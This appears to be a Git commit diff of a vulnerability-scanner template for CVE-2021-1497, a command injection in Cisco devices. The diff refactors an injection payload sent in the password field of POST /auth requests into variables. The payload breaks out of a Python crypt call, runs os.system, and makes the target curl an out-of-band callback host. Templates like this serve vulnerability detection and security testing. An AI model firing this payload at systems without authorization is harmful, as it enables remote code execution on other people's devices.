commit
35a4dcd981
|
@ -19,12 +19,14 @@ info:
|
||||||
cve-id: CVE-2021-1497
|
cve-id: CVE-2021-1497
|
||||||
cwe-id: CWE-78
|
cwe-id: CWE-78
|
||||||
epss-score: 0.9751
|
epss-score: 0.9751
|
||||||
tags: cisco,rce,oast,kev,packetstorm,cve,cve2021
|
tags: cve,cve2021,cisco,rce,oast,kev,packetstorm,
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 2
|
max-request: 2
|
||||||
|
|
||||||
variables:
|
variables:
|
||||||
useragent: '{{rand_base(6)}}'
|
useragent: '{{rand_base(6)}}'
|
||||||
|
cmd: 'curl http://{{interactsh-url}} -H \"User-Agent: {{useragent}}\"'
|
||||||
|
payload: '123",""$6$$)); import os;os.system("{{cmd}}");print(crypt.crypt("'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -34,7 +36,7 @@ http:
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\");print(crypt.crypt(\"')}}
|
username=root&password={{url_encode(payload)}}
|
||||||
|
|
||||||
- |
|
- |
|
||||||
POST /auth HTTP/1.1
|
POST /auth HTTP/1.1
|
||||||
|
@ -42,7 +44,7 @@ http:
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\");print(crypt.crypt(\"')}}
|
username=root&password={{url_encode(payload)}}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
Loading…
Reference in New Issue